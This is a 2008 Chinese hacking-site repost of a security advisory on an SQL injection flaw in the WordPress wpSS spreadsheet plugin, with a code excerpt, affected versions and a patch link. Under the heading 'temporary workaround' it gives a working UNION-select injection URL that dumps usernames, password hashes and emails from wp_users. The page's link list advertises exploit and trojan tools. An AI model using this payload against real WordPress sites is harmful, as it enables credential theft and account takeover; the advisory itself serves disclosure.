黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·WordPress wpSS插件ss_i05-04·Oblog漏洞五一重现05-04
·跨站脚本-攻击和防御指05-04·两个shellcode05-04
·代理工具:CTProxy 1.0 05-04·强悍挂马工具:IIS_AD I05-04
·Windows XP with SP3 VO05-04·易美网络提供1000M网络免05-04
·终点免费空间提供100M免05-04·Vista中新增命令完整版 05-01
·Windows系统中的“普通人05-01·oxyhostsfree.com提供5G05-01
·实用技巧 玩转Vista下备04-29·V9站长天空提供200M高速04-29
·用WinHEX远程查杀顽固病04-28·js下载者04-28
·又一个MS08-025溢出工具04-28·MS08-025 for win2k & w04-28
·WEB暴力破解工具(wvs fu04-28·最近比较流行的数据库挂04-28
·攻击木马–远程控制软件04-28·仿SQLTOOLS 写的一个工具04-28
·输入小助手.vbs04-28·logtamper-v1.0 修改lin04-28
·nasl插件生成器(带源码04-28·OBlog 的SQL注入漏洞检测04-28
·经典Windows XP系统故障04-28·全民红客 CNN攻击技术解04-28
[注意]WordPress wpSS插件ss_id参数SQL注入漏洞
        ★★★★★

WordPress wpSS插件ss_id参数SQL注入漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-4 11:16:01
受影响系统:
WordPress wpSS <= 0.6 v
不受影响系统:
WordPress wpSS 0.62

描述:

--------------------------------------------------------------------------------
BUGTRAQ  ID: 28894
wpSS是WordPress中所使用的电子表格插件,允许在WordPress博客中嵌入交互式的电子表格。
wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中:
ss_load.php
$id = $_GET[′ss_id′];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
if ($wpdb->query("CT * $table_name id=′$id′") == 0) {
....
这允许远程攻击者通过注入任意SQL代码操控SQL查询,导致执行任意代码。
<*来源:1ten0.0net1
链接:http://secunia.com/advisories/29938/
*>

建议:

--------------------------------------------------------------------------------

临时解决方法:

http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4++wp_users--&display=plain
厂商补丁:
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://timrohrer.com/blog/?page_id=71
文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886